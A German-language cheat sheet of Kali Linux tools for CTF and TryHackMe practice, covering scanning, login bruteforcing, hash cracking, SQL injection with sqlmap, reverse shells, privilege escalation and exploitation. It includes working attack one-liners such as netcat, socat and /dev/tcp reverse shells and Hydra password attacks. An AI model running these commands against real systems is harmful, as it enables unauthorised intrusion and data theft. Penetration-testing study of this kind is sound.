🔐 Kali Linux · CTF / TryHackMe

ToolsSheet

Alle wichtigen Kali-Tools — Wann nutzen, Was kann es, Commands & Alternativen.

🔎

Recon & Scanning

Rustscan
  • Ganz am Anfang eines CTFs (schneller Portscan)
  • Sehr schneller Port-Scanner
  • Übergabe an Nmap möglich
rustscan -a <IP>
Schneller Standardscan
rustscan -a <IP> --ulimit 5000
Mehr gleichzeitige Verbindungen
rustscan -a <IP> -- -sC -sV
Nmap Scripts + Versionen
  • Nmap
  • Masscan
Nmap
  • Nach Rustscan
  • Für detaillierte Analyse
  • Service Detection
  • OS Detection
  • Scripts (NSE)
nmap -sC -sV <IP>
Standardscan
nmap -p- <IP>
Alle Ports scannen
nmap -A <IP>
Aggressiver Scan
nmap --script vuln <IP>
Schwachstellen suchen
  • Rustscan
  • Masscan
Masscan
  • Große Netzwerke
  • Extrem schneller Scan nötig
  • Scannt extrem schnell Ports
  • Ideal für /16 oder größere Netze
masscan -p1-65535 <IP> --rate=1000
Alle Ports
masscan -p80,443 <IP>
Bestimmte Ports
masscan -p22 <IP> --rate=5000
Schneller gezielter Scan
  • Rustscan
  • Nmap
🔑

Bruteforce

Hydra
  • Login Bruteforce (SSH, FTP, HTTP)
  • Multi-Protokoll Bruteforce
  • Unterstützt SSH, FTP, HTTP, SMB und mehr
hydra -l admin -P rockyou.txt <IP> ssh
SSH Bruteforce
hydra -L users.txt -P passwords.txt <IP> ftp
FTP Multi-User
hydra -l admin -P rockyou.txt <IP> http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
Web Login
  • Medusa
  • Ncrack
Medusa
  • Große Wordlists
  • Stabilere Alternative zu Hydra
  • Schneller paralleler Bruteforce
  • Unterstützt viele Protokolle
medusa -h <IP> -u admin -P rockyou.txt -M ssh
SSH Bruteforce
medusa -h <IP> -U users.txt -P passwords.txt -M ftp
FTP Multi-User
medusa -h <IP> -u admin -P rockyou.txt -M http
HTTP Bruteforce
  • Hydra
  • Ncrack
Ncrack
  • Viele Hosts gleichzeitig
  • Sehr effizient bei Netzwerk-Angriffen
  • Nmap-Syntax kompatibel
ncrack -p ssh <IP> -u admin -P rockyou.txt
SSH Crack
ncrack -p ftp <IP> --user admin --pass wordlist.txt
FTP Crack
ncrack -p ssh,ftp <IP>
Multi-Protokoll
  • Hydra
  • Medusa
Burp Suite
  • Web Login Analyse
  • Komplexe Authentifizierung
  • Requests abfangen & manipulieren
  • Bruteforce mit Intruder
  • Aktiver & passiver Scanner
1. Proxy aktivieren → Request abfangen
2. Send to Intruder → Payload § setzen
3. Wordlist laden → Attack → Antworten vergleichen
Status/Länge prüfen
  • OWASP ZAP
  • FFUF
🔓

Password Cracking

John the Ripper
  • Offline Hashes cracken
  • Dictionary + Rule Attacks
  • Viele Hash-Typen unterstützt
john hash.txt
Standard Crack
john --wordlist=rockyou.txt hash.txt
Wordlist Angriff
john --show hash.txt
Gecrackte Passwörter anzeigen
  • Hashcat (GPU, schneller)
Hashcat
  • Große Hashes / GPU verfügbar
  • Extrem schneller GPU-Cracker
  • 300+ Hash-Typen
hashcat -m 0 hash.txt rockyou.txt
MD5 Crack
hashcat -a 3 -m 0 hash.txt ?a?a?a?a
Brute-Force Modus
hashcat --show hash.txt
Ergebnisse anzeigen
  • John the Ripper
🌐

Web Exploitation

SQLMap
  • SQL Injection vermutet
  • Automatisiert SQLi Erkennung
  • Datenbank-Dump
  • Shell-Zugriff möglich
sqlmap -u "<URL>" --dbs
Datenbanken anzeigen
sqlmap -u "<URL>" --tables
Tabellen anzeigen
sqlmap -u "<URL>" --dump
Daten extrahieren
  • Burp Suite
  • Manual Testing
Gobuster
  • Verzeichnisse finden
  • Directory & File Bruteforce
  • DNS Subdomain Enumeration
gobuster dir -u http://<IP> -w wordlist.txt
Directory Bruteforce
gobuster dir -u http://<IP> -w wordlist.txt -x php,html
Mit Dateiendungen
gobuster dns -d domain.com -w wordlist.txt
DNS Subdomains
  • FFUF
  • Dirsearch
FFUF
  • Schnelles Web Fuzzing
  • Parameter & Directory Bruteforce
  • Sehr flexibel filterbar
ffuf -u http://<IP>/FUZZ -w wordlist.txt
Pfade finden
ffuf -u http://<IP>/FUZZ -w wordlist.txt -fc 404
404er ausfiltern
ffuf -u http://<IP>/index.php?FUZZ=test -w params.txt
Parameter fuzzen
  • Gobuster
  • Burp Intruder
Nikto
  • Schneller Webscan
  • Findet bekannte Schwachstellen
  • Checks für Fehlkonfigurationen
nikto -h http://<IP>
Standard Scan
nikto -h <IP> -p 80,443
Mehrere Ports
nikto -h http://<IP> -Tuning x
Erweiterte Prüfungen
  • Nmap Scripts
  • Burp
🖧

Shells & Networking

Netcat
  • Reverse Shells
  • Debugging
  • TCP/UDP Kommunikation
  • Listener für Shells
  • File Transfer
nc -lvnp 4444
Listener starten
nc <IP> 4444
Verbinden
nc -e /bin/bash <IP> 4444
Bash Shell senden
  • Socat
Socat
  • Stabilere Shells als Netcat
  • Erweiterte Netzwerkverbindungen
  • Vollständige TTY möglich
socat TCP-LISTEN:4444 EXEC:/bin/bash
Listener
socat TCP:<IP>:4444 EXEC:/bin/bash
Verbinden
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash
Mit Fork
  • Netcat
Reverse Shell
  • Nach erfolgreichem Exploit
  • Verbindung zurück zum Angreifer
  • Umgeht Firewalls (outbound)
bash -i >& /dev/tcp/<IP>/4444 0>&1
Bash Reverse Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
Shell stabilisieren
  • revshells.com (Generator)
  • Metasploit meterpreter
🧠

Privilege Escalation

LinPEAS
  • Direkt nach initialer Shell
  • Automatische PrivEsc Checks
  • SUID, Cron, Sudo, Capabilities
./linpeas.sh
Vollscan starten
chmod +x linpeas.sh
Ausführbar machen
./linpeas.sh | tee output.txt
Output speichern
  • LinEnum
  • linux-smart-enumeration (lse.sh)
Sudo / SUID
  • Immer direkt nach Shell
  • Sudo-Rechte prüfen
  • SUID-Binaries → GTFOBins
sudo -l
Sudo Rechte anzeigen
find / -perm -4000 -type f 2>/dev/null
SUID Files finden
cat /etc/crontab
Cronjobs prüfen
  • GTFOBins (gtfobins.github.io)
📂

File Transfer

Python HTTP Server
  • Dateien auf Zielsystem übertragen
  • Lokaler Webserver in einer Zeile
  • Dateien per wget/curl abrufbar
python3 -m http.server 8000
Server starten
python3 -m http.server 80
Port 80
python3 -m http.server --bind 0.0.0.0 8000
Alle Interfaces
  • Netcat
  • SCP
Wget / Curl
  • Dateien herunterladen
  • Dateien von HTTP/FTP laden
  • Curl für HTTP-Requests
wget http://<IP>:8000/file
Datei laden
curl http://<IP>:8000/file -o file
Mit curl
curl -O http://<IP>:8000/file
Original-Name behalten
  • FTP
  • SCP
🔍

Enumeration Services

SMB
  • Port 445 offen
  • Shares anzeigen
  • Dateien lesen/schreiben
  • Lateral Movement
smbclient -L //<IP> -N
Shares anzeigen
smbmap -H <IP>
Shares + Rechte
enum4linux <IP>
Vollständige SMB Enum
  • CrackMapExec
SNMP
  • Port 161 offen
  • System-Infos auslesen
  • Oft unterschätzt → viele Infos
snmpwalk -c public -v1 <IP>
SNMP Daten lesen
snmp-check <IP>
Formatierter Output
onesixtyone -c community.txt <IP>
Community String bruten
  • Nmap SNMP Scripts
🧰

Exploitation

Searchsploit
  • Nach Nmap Scan
  • Exploit suchen
  • Lokale Exploit-DB Suche
  • Offline nutzbar
searchsploit apache
Exploits suchen
searchsploit -x exploit
Exploit anzeigen
searchsploit -m exploit
Exploit kopieren
  • Exploit-DB (online)
Metasploit
  • Wenn Exploit existiert
  • Exploit Framework
  • Meterpreter Sessions
  • Post-Exploitation
msfconsole
Framework starten
search <exploit>
Exploit suchen
use exploit/...
Exploit laden
set RHOSTS <IP> && run
Konfigurieren und ausführen
  • Manual Exploit